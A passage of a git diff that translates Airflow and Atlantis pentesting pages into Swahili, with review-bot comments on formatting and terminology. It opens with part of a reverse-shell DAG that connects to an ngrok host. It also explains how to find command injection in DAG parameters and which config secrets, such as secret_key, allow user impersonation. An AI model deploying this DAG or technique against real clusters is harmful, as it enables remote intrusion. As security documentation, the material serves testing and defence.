- dag_id='rev_shell_python2',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_python2',
+schedule_interval='0 0 * * *',
+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
- run = PythonOperator(
- task_id='rs_python2',
- python_callable=rs,
- op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
+run = PythonOperator(
+task_id='rs_python2',
+python_callable=rs,
+op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
```
+#### Uundaji wa DAG
-#### DAG Creation
+Ikiwa utafanikiwa **kushambulia mashine ndani ya klasta ya DAG**, unaweza kuunda **scripts za DAG** mpya katika folda ya `dags/` na zitakuwa **zinakopiwa katika mashine zingine** ndani ya klasta ya DAG.
-If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
+#### Uingiliaji wa Kode ya DAG
-#### DAG Code Injection
+Unapotekeleza DAG kutoka kwa GUI unaweza **kupitisha hoja** kwake.\
+Hivyo, ikiwa DAG haijakodishwa vizuri inaweza kuwa **na udhaifu wa Uingiliaji wa Amri.**\
+Hivyo ndivyo ilivyotokea katika CVE hii: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
-When you execute a DAG from the GUI you can **pass arguments** to it.\
-Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\
-That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
-
-All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**.
-
-Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**:
+Kila unachohitaji kujua ili **kuanza kutafuta uingiliaji wa amri katika DAGs** ni kwamba **parameta** zinapatikana kwa kode **`dag_run.conf.get("param_name")`**.
+Zaidi ya hayo, udhaifu sawa unaweza kutokea na **mabadiliko** (zingatia kwamba kwa ruhusa ya kutosha unaweza **kudhibiti thamani ya mabadiliko** katika GUI). Mabadiliko yanapatikana kwa:
```python
from airflow.models import Variable
[...]
foo = Variable.get("foo")
```
-
-If they are used for example inside a a bash command, you could perform a command injection.
+Ikiwa zinatumika kwa mfano ndani ya amri ya bash, unaweza kufanya uhamasishaji wa amri.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
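Review bot: the Python block in this hunk is no longer valid Python after translation, because the leading indentation was stripped from the function body (`s = socket.socket()` through `pty.spawn("/bin/sh")` under `def rs(rhost, port):`), from the `with DAG(` keyword arguments and from the `PythonOperator(` arguments; Airflow raises an IndentationError when it imports the file, so the example stops illustrating the scheduler behaviour the paragraph describes. Restore the original four-space indentation, and in general keep fenced code out of the translation pass. While these lines are being touched, the `PythonOperator(` call was already missing its closing `)` in the original and is worth closing. The blank lines between paragraphs were also dropped, so `Kila unachohitaji kujua ...` and `Zaidi ya hayo, ...` are now adjacent lines and render as one paragraph; put the blank line back. Terminology: "command injection" is `Uingiliaji wa Amri` in the heading and first paragraph but `uhamasishaji wa amri` ("command mobilization/awareness") in the last sentence, so use one term; and `mabadiliko` literally means "changes", which reads oddly for Airflow Variables (a named object, cf. `Variable.get("foo")` in the same block), so either keep the English `Variables` or choose a word that does not collide with "changes".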
diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
index 5fd8e486b..758433425 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
@@ -4,112 +4,102 @@
## Configuration File
-**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
+**Apache Airflow** inazalisha **config file** katika mashine zote za airflow inayoitwa **`airflow.cfg`** katika nyumbani ya mtumiaji wa airflow. Faili hii ya config ina taarifa za usanidi na **inaweza kuwa na taarifa za kuvutia na nyeti.**
-**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
+**Kuna njia mbili za kufikia faili hii: Kwa kuathiri mashine fulani ya airflow, au kwa kufikia console ya wavuti.**
-Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
+Kumbuka kwamba **maadili ndani ya faili ya config** **yanaweza kuwa si yale yanayotumika**, kwani unaweza kuyabadilisha kwa kuweka mabadiliko ya mazingira kama `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
-If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
-If you have **access to some machine inside the airflow env**, check the **environment**.
+Ikiwa una ufikiaji wa **faili ya config katika seva ya wavuti**, unaweza kuangalia **usanidi halisi unaoendelea** katika ukurasa huo ambapo config inaonyeshwa.\
+Ikiwa una **ufikiaji wa mashine fulani ndani ya mazingira ya airflow**, angalia **mazingira**.
-Some interesting values to check when reading the config file:
+Baadhi ya maadili ya kuvutia ya kuangalia unapokuwa unaisoma faili ya config:
### \[api]
-- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
-- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
-- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
-- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API:
- - `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
- - `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
- - `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
- - `airflow.api.auth.backend.basic_auth`: For **basic authentication**
- - `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
- - `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
- - You can also **create you own authentication** method with python.
-- **`google_key_path`:** Path to the **GCP service account key**
+- **`access_control_allow_headers`**: Hii inaonyesha **headers** **zinazoruhusiwa** kwa **CORS**
+- **`access_control_allow_methods`**: Hii inaonyesha **mbinu** **zinazoruhusiwa** kwa **CORS**
+- **`access_control_allow_origins`**: Hii inaonyesha **michango** **zinazoruhusiwa** kwa **CORS**
+- **`auth_backend`**: [**Kulingana na nyaraka**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) chaguzi chache zinaweza kuwekwa ili kuunda nani anaweza kufikia API:
+- `airflow.api.auth.backend.deny_all`: **Kwa default hakuna** anayeweza kufikia API
+- `airflow.api.auth.backend.default`: **Kila mtu anaweza** kuifikia bila uthibitisho
+- `airflow.api.auth.backend.kerberos_auth`: Ili kuunda **uthibitisho wa kerberos**
+- `airflow.api.auth.backend.basic_auth`: Kwa **uthibitisho wa msingi**
+- `airflow.composer.api.backend.composer_auth`: Inatumia uthibitisho wa waandishi (GCP) (kutoka [**hapa**](https://cloud.google.com/composer/docs/access-airflow-api)).
+- `composer_auth_user_registration_role`: Hii inaonyesha **nafasi** ambayo **mtumiaji wa composer** atapata ndani ya **airflow** (**Op** kwa default).
+- Unaweza pia **kuunda njia yako ya uthibitisho** kwa kutumia python.
+- **`google_key_path`:** Njia ya **GCP service account key**
### **\[atlas]**
-- **`password`**: Atlas password
-- **`username`**: Atlas username
+- **`password`**: Neno la siri la Atlas
+- **`username`**: Jina la mtumiaji la Atlas
### \[celery]
-- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
-- **`result_backend`**: Postgres url which may contain **credentials**.
-- **`ssl_cacert`**: Path to the cacert
-- **`ssl_cert`**: Path to the cert
-- **`ssl_key`**: Path to the key
+- **`flower_basic_auth`** : Taarifa za kuingia (_user1:password1,user2:password2_)
+- **`result_backend`**: URL ya Postgres ambayo inaweza kuwa na **taarifa za kuingia**.
+- **`ssl_cacert`**: Njia ya cacert
+- **`ssl_cert`**: Njia ya cheti
+- **`ssl_key`**: Njia ya ufunguo
### \[core]
-- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that donāt contain the strings `DAG` and `airflow`.
-- **`fernet_key`**: Key to store encrypted variables (symmetric)
-- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
-- **`security`**: What security module to use (for example kerberos)
+- **`dag_discovery_safe_mode`**: Imewezeshwa kwa default. Wakati wa kugundua DAGs, puuza faili zozote ambazo hazina nyuzi `DAG` na `airflow`.
+- **`fernet_key`**: Ufunguzi wa kuhifadhi mabadiliko yaliyosimbwa (symmetric)
+- **`hide_sensitive_var_conn_fields`**: Imewezeshwa kwa default, ficha taarifa nyeti za muunganisho.
+- **`security`**: Moduli gani ya usalama itumike (kwa mfano kerberos)
### \[dask]
-- **`tls_ca`**: Path to ca
-- **`tls_cert`**: Part to the cert
-- **`tls_key`**: Part to the tls key
+- **`tls_ca`**: Njia ya ca
+- **`tls_cert`**: Njia ya cheti
+- **`tls_key`**: Njia ya ufunguo wa tls
### \[kerberos]
-- **`ccache`**: Path to ccache file
-- **`forwardable`**: Enabled by default
+- **`ccache`**: Njia ya faili ya ccache
+- **`forwardable`**: Imewezeshwa kwa default
### \[logging]
-- **`google_key_path`**: Path to GCP JSON creds.
+- **`google_key_path`**: Njia ya GCP JSON creds.
### \[secrets]
-- **`backend`**: Full class name of secrets backend to enable
-- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
+- **`backend`**: Jina kamili la darasa la nyuma la siri ili kuwezesha
+- **`backend_kwargs`**: Param ya backend_kwargs inasomwa katika kamusi na kupitishwa kwa **init** ya darasa la nyuma la siri.
### \[smtp]
-- **`smtp_password`**: SMTP password
-- **`smtp_user`**: SMTP user
+- **`smtp_password`**: Neno la siri la SMTP
+- **`smtp_user`**: Mtumiaji wa SMTP
### \[webserver]
-- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
-- **`cookie_secure`**: Set **secure flag** on the the session cookie
-- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console**
-- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
-- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
-- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
-- **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
-- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
+- **`cookie_samesite`**: Kwa default ni **Lax**, hivyo tayari ni thamani dhaifu zaidi
+- **`cookie_secure`**: Weka **bendera salama** kwenye cookie ya kikao
+- **`expose_config`**: Kwa default ni False, ikiwa ni kweli, **config** inaweza **kusomwa** kutoka kwa **console** ya wavuti
+- **`expose_stacktrace`**: Kwa default ni Kweli, itaonyesha **python tracebacks** (inaweza kuwa na manufaa kwa mshambuliaji)
+- **`secret_key`**: Hii ni **ufunguo unaotumiwa na flask kusaini cookies** (ikiwa una hii unaweza **kujifanya kuwa mtumiaji yeyote katika Airflow**)
+- **`web_server_ssl_cert`**: **Njia** ya **SSL** **cheti**
+- **`web_server_ssl_key`**: **Njia** ya **SSL** **Key**
+- **`x_frame_enabled`**: Default ni **True**, hivyo kwa default clickjacking haiwezekani
### Web Authentication
-By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
-
+Kwa default **uthibitisho wa wavuti** umeainishwa katika faili **`webserver_config.py`** na umewekwa kama
```bash
AUTH_TYPE = AUTH_DB
```
-
-Which means that the **authentication is checked against the database**. However, other configurations are possible like
-
+Ambayo inamaanisha kwamba **uthibitishaji unakaguliwa dhidi ya hifadhidata**. Hata hivyo, usanidi mwingine unaweza kuwa kama
```bash
AUTH_TYPE = AUTH_OAUTH
```
+Ili kuacha **uthibitishaji kwa huduma za upande wa tatu**.
-To leave the **authentication to third party services**.
-
-However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**:
-
+Hata hivyo, kuna chaguo pia la **kuruhusu watumiaji wasiojulikana kuingia**, kuweka parameter ifuatayo kwa **jukumu lililotakikana**:
```bash
AUTH_ROLE_PUBLIC = 'Admin'
```
-
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
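Review bot: the nested list under `auth_backend` was flattened. In the original, the `deny_all`, `default`, `kerberos_auth`, `basic_auth` and `composer_auth` backends and `composer_auth_user_registration_role` were indented two spaces as sub-items of `auth_backend`; in the translated version they sit at the same level as `access_control_allow_*` and `google_key_path`, so the rendered page no longer presents them as possible values of `auth_backend`. Restore the two leading spaces on those lines. The blank lines around the `AUTH_TYPE` fences were removed as well, and `Ili kuacha uthibitishaji ...` now sits directly above `Hata hivyo, kuna chaguo pia ...`, so the two sentences render as a single paragraph. Two wording points: `fernet_key` is described as `Ufunguzi` ("opening") whereas `ufunguo` ("key") is used for `ssl_key` and `tls_key` in this same hunk; and `access_control_allow_origins` is rendered as `michango` ("contributions"), which loses the CORS meaning, so leave `origins` in English as the other CORS items do with `CORS`. Pre-existing but worth fixing since the line is rewritten: the `cookie_samesite` entry says Lax "is already the weakest possible value"; `None` is weaker (it permits cross-site cookie sends when combined with `Secure`), so the defensive takeaway is that Lax is the default and should not be lowered to `None`.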
diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
index 7ff782327..273177f25 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
@@ -4,44 +4,40 @@
## RBAC
-(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
+(Kutoka kwenye nyaraka)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow inakuja na **seti ya majukumu kwa default**: **Admin**, **User**, **Op**, **Viewer**, na **Public**. **Ni `Admin` tu** watumiaji wanaweza **kuunda/kubadilisha ruhusa za majukumu mengine**. Lakini haipendekezwi kwa watumiaji wa `Admin` kubadilisha majukumu haya ya default kwa njia yoyote kwa kuondoa au kuongeza ruhusa kwa majukumu haya.
-- **`Admin`** users have all possible permissions.
-- **`Public`** users (anonymous) donāt have any permissions.
-- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.**
-- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file**
-- **`Op`** users have `User` permissions plus additional op permissions.
+- **`Admin`** watumiaji wana ruhusa zote zinazowezekana.
+- **`Public`** watumiaji (wasiojulikana) hawana ruhusa yoyote.
+- **`Viewer`** watumiaji wana ruhusa za mtazamaji zilizo na mipaka (kusoma tu). **Haiwezi kuona usanidi.**
+- **`User`** watumiaji wana ruhusa za `Viewer` pamoja na ruhusa za ziada za mtumiaji zinazomruhusu kusimamia DAGs kidogo. Anaweza **kuona faili ya usanidi**
+- **`Op`** watumiaji wana ruhusa za `User` pamoja na ruhusa za ziada za op.
-Note that **admin** users can **create more roles** with more **granular permissions**.
+Kumbuka kwamba **watumiaji wa admin** wanaweza **kuunda majukumu zaidi** yenye **ruhusa za kina**.
-Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
+Pia kumbuka kwamba jukumu pekee la default lenye **ruhusa ya kuorodhesha watumiaji na majukumu ni Admin, hata `Op` hataweza kufanya hivyo.**
-### Default Permissions
+### Ruhusa za Default
-These are the default permissions per default role:
+Hizi ndizo ruhusa za default kwa kila jukumu la default:
- **Admin**
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, 
can get on MenuApi, menu access on Providers, can create on XComs]
+\[anaweza kufuta kwenye Connections, anaweza kusoma kwenye Connections, anaweza kuhariri kwenye Connections, anaweza kuunda kwenye Connections, anaweza kusoma kwenye DAGs, anaweza kuhariri kwenye DAGs, anaweza kufuta kwenye DAGs, anaweza kusoma kwenye DAG Runs, anaweza kusoma kwenye Task Instances, anaweza kuhariri kwenye Task Instances, anaweza kufuta kwenye DAG Runs, anaweza kuunda kwenye DAG Runs, anaweza kuhariri kwenye DAG Runs, anaweza kusoma kwenye Audit Logs, anaweza kusoma kwenye ImportError, anaweza kufuta kwenye Pools, anaweza kusoma kwenye Pools, anaweza kuhariri kwenye Pools, anaweza kuunda kwenye Pools, anaweza kusoma kwenye Providers, anaweza kufuta kwenye Variables, anaweza kusoma kwenye Variables, anaweza kuhariri kwenye Variables, anaweza kuunda kwenye Variables, anaweza kusoma kwenye XComs, anaweza kusoma kwenye DAG Code, anaweza kusoma kwenye Configurations, anaweza kusoma kwenye Plugins, anaweza kusoma kwenye Roles, anaweza kusoma kwenye Permissions, anaweza kufuta kwenye Roles, anaweza kuhariri kwenye Roles, anaweza kuunda kwenye Roles, anaweza kusoma kwenye Users, anaweza kuunda kwenye Users, anaweza kuhariri kwenye Users, anaweza kufuta kwenye Users, anaweza kusoma kwenye DAG Dependencies, anaweza kusoma kwenye Jobs, anaweza kusoma kwenye My Password, anaweza kuhariri kwenye My Password, anaweza kusoma kwenye My Profile, anaweza kuhariri kwenye My Profile, anaweza kusoma kwenye SLA Misses, anaweza kusoma kwenye Task Logs, anaweza kusoma kwenye Website, ufikiaji wa menyu kwenye Browse, ufikiaji wa menyu kwenye DAG Dependencies, ufikiaji wa menyu kwenye DAG Runs, ufikiaji wa menyu kwenye Documentation, ufikiaji wa menyu kwenye Docs, ufikiaji wa menyu kwenye Jobs, ufikiaji wa menyu kwenye Audit Logs, ufikiaji wa menyu kwenye Plugins, ufikiaji wa menyu kwenye SLA Misses, ufikiaji wa menyu kwenye Task Instances, anaweza kuunda kwenye Task Instances, anaweza kufuta kwenye Task Instances, ufikiaji wa menyu kwenye Admin, ufikiaji wa menyu kwenye 
Configurations, ufikiaji wa menyu kwenye Connections, ufikiaji wa menyu kwenye Pools, ufikiaji wa menyu kwenye Variables, ufikiaji wa menyu kwenye XComs, anaweza kufuta kwenye XComs, anaweza kusoma kwenye Task Reschedules, ufikiaji wa menyu kwenye Task Reschedules, anaweza kusoma kwenye Triggers, ufikiaji wa menyu kwenye Triggers, anaweza kusoma kwenye Passwords, anaweza kuhariri kwenye Passwords, ufikiaji wa menyu kwenye List Users, ufikiaji wa menyu kwenye Security, ufikiaji wa menyu kwenye List Roles, anaweza kusoma kwenye User Stats Chart, ufikiaji wa menyu kwenye User's Statistics, ufikiaji wa menyu kwenye Base Permissions, anaweza kusoma kwenye View Menus, ufikiaji wa menyu kwenye Views/Menus, anaweza kusoma kwenye Permission Views, ufikiaji wa menyu kwenye Permission on Views/Menus, anaweza kupata kwenye MenuApi, ufikiaji wa menyu kwenye Providers, anaweza kuunda kwenye XComs]
- **Op**
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
+\[anaweza kufuta kwenye Connections, anaweza kusoma kwenye Connections, anaweza kuhariri kwenye Connections, anaweza kuunda kwenye Connections, anaweza kusoma kwenye DAGs, anaweza kuhariri kwenye DAGs, anaweza kufuta kwenye DAGs, anaweza kusoma kwenye DAG Runs, anaweza kusoma kwenye Task Instances, anaweza kuhariri kwenye Task Instances, anaweza kufuta kwenye DAG Runs, anaweza kuunda kwenye DAG Runs, anaweza kuhariri kwenye DAG Runs, anaweza kusoma kwenye Audit Logs, anaweza kusoma kwenye ImportError, anaweza kufuta kwenye Pools, anaweza kusoma kwenye Pools, anaweza kuhariri kwenye Pools, anaweza kuunda kwenye Pools, anaweza kusoma kwenye Providers, anaweza kufuta kwenye Variables, anaweza kusoma kwenye Variables, anaweza kuhariri kwenye Variables, anaweza kuunda kwenye Variables, anaweza kusoma kwenye XComs, anaweza kusoma kwenye DAG Code, anaweza kusoma kwenye Configurations, anaweza kusoma kwenye Plugins, anaweza kusoma kwenye DAG Dependencies, anaweza kusoma kwenye Jobs, anaweza kusoma kwenye My Password, anaweza kuhariri kwenye My Password, anaweza kusoma kwenye My Profile, anaweza kuhariri kwenye My Profile, anaweza kusoma kwenye SLA Misses, anaweza kusoma kwenye Task Logs, anaweza kusoma kwenye Website, ufikiaji wa menyu kwenye Browse, ufikiaji wa menyu kwenye DAG Dependencies, ufikiaji wa menyu kwenye DAG Runs, ufikiaji wa menyu kwenye Documentation, ufikiaji wa menyu kwenye Docs, ufikiaji wa menyu kwenye Jobs, ufikiaji wa menyu kwenye Audit Logs, ufikiaji wa menyu kwenye Plugins, ufikiaji wa menyu kwenye SLA Misses, ufikiaji wa menyu kwenye Task Instances, anaweza kuunda kwenye Task Instances, anaweza kufuta kwenye Task Instances, ufikiaji wa menyu kwenye Admin, ufikiaji wa menyu kwenye Configurations, ufikiaji wa menyu kwenye Connections, ufikiaji wa menyu kwenye Pools, ufikiaji wa menyu kwenye Variables, ufikiaji wa menyu kwenye XComs, anaweza kufuta kwenye XComs]
- **User**
-\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
+\[anaweza kusoma kwenye DAGs, anaweza kuhariri kwenye DAGs, anaweza kufuta kwenye DAGs, anaweza kusoma kwenye DAG Runs, anaweza kusoma kwenye Task Instances, anaweza kuhariri kwenye Task Instances, anaweza kufuta kwenye DAG Runs, anaweza kuunda kwenye DAG Runs, anaweza kuhariri kwenye DAG Runs, anaweza kusoma kwenye Audit Logs, anaweza kusoma kwenye ImportError, anaweza kusoma kwenye XComs, anaweza kusoma kwenye DAG Code, anaweza kusoma kwenye Plugins, anaweza kusoma kwenye DAG Dependencies, anaweza kusoma kwenye Jobs, anaweza kusoma kwenye My Password, anaweza kuhariri kwenye My Password, anaweza kusoma kwenye My Profile, anaweza kuhariri kwenye My Profile, anaweza kusoma kwenye SLA Misses, anaweza kusoma kwenye Task Logs, anaweza kusoma kwenye Website, ufikiaji wa menyu kwenye Browse, ufikiaji wa menyu kwenye DAG Dependencies, ufikiaji wa menyu kwenye DAG Runs, ufikiaji wa menyu kwenye Documentation, ufikiaji wa menyu kwenye Docs, ufikiaji wa menyu kwenye Jobs, ufikiaji wa menyu kwenye Audit Logs, ufikiaji wa menyu kwenye Plugins, ufikiaji wa menyu kwenye SLA Misses, ufikiaji wa menyu kwenye Task Instances, anaweza kuunda kwenye Task Instances, anaweza kufuta kwenye Task Instances]
- **Viewer**
-\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
+\[anaweza kusoma kwenye DAGs, anaweza kusoma kwenye DAG Runs, anaweza kusoma kwenye Task Instances, anaweza kusoma kwenye Audit Logs, anaweza kusoma kwenye ImportError, anaweza kusoma kwenye XComs, anaweza kusoma kwenye DAG Code, anaweza kusoma kwenye Plugins, anaweza kusoma kwenye DAG Dependencies, anaweza kusoma kwenye Jobs, anaweza kusoma kwenye My Password, anaweza kuhariri kwenye My Password, anaweza kusoma kwenye My Profile, anaweza kuhariri kwenye My Profile, anaweza kusoma kwenye SLA Misses, anaweza kusoma kwenye Task Logs, anaweza kusoma kwenye Website, ufikiaji wa menyu kwenye Browse, ufikiaji wa menyu kwenye DAG Dependencies, ufikiaji wa menyu kwenye DAG Runs, ufikiaji wa menyu kwenye Documentation, ufikiaji wa menyu kwenye Docs, ufikiaji wa menyu kwenye Jobs, ufikiaji wa menyu kwenye Audit Logs, ufikiaji wa menyu kwenye Plugins, ufikiaji wa menyu kwenye SLA Misses, ufikiaji wa menyu kwenye Task Instances]
- **Public**
\[]
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
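Review bot: the permission strings in the Default Permissions lists ("can delete on Connections", "menu access on Browse", ...) are the literal names Airflow displays in the Security > List Roles view, so translating them to `anaweza kufuta kwenye Connections` breaks the one-to-one match a reader needs when comparing a role in the UI against this list; the half-translated form (action translated, resource names such as `Connections` and `DAG Runs` kept in English) is also harder to search for. Suggest leaving these lists untouched, as the `### Web Authentication` heading and the `[api]`/`[celery]` section names were left in the sibling files. Pre-existing but touched here: `(Kutoka kwenye nyaraka)\[https://...]` keeps the broken link syntax of the original (escaped bracket, no `(url)` part), so it renders as literal text rather than a link; `[Kutoka kwenye nyaraka](https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html)` fixes it.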
diff --git a/src/pentesting-ci-cd/atlantis-security.md b/src/pentesting-ci-cd/atlantis-security.md
index a4b35140f..9333d4c16 100644
--- a/src/pentesting-ci-cd/atlantis-security.md
+++ b/src/pentesting-ci-cd/atlantis-security.md
@@ -4,109 +4,109 @@
### Basic Information
-Atlantis basically helps you to to run terraform from Pull Requests from your git server.
+Atlantis kimsingi inakusaidia kuendesha terraform kutoka kwa Pull Requests kutoka kwa seva yako ya git.
.png>)
### Local Lab
-1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
-2. Create a **personal token** (with repo access) of your **github** user
-3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
- 1. You can access the web page in 127.0.0.1:4141
+1. Nenda kwenye **ukurasa wa toleo la atlantis** katika [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) na **pakua** ile inayokufaa.
+2. Unda **token ya kibinafsi** (ikiwa na ufikiaji wa repo) ya mtumiaji wako wa **github**
+3. Tekeleza `./atlantis testdrive` na itaunda **demo repo** ambayo unaweza kutumia ku **zungumza na atlantis**
+1. Unaweza kufikia ukurasa wa wavuti katika 127.0.0.1:4141
### Atlantis Access
#### Git Server Credentials
-**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
-However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
-[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts.
+**Atlantis** inasaidia wenyeji kadhaa wa git kama **Github**, **Gitlab**, **Bitbucket** na **Azure DevOps**.\
+Hata hivyo, ili kufikia repos katika majukwaa hayo na kufanya vitendo, inahitaji kuwa na **ufikiaji wa kibali uliopewa** (angalau ruhusa za kuandika).\
+[**Nyaraka**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) zinahimiza kuunda mtumiaji katika majukwaa haya mahsusi kwa Atlantis, lakini watu wengine wanaweza kutumia akaunti za kibinafsi.
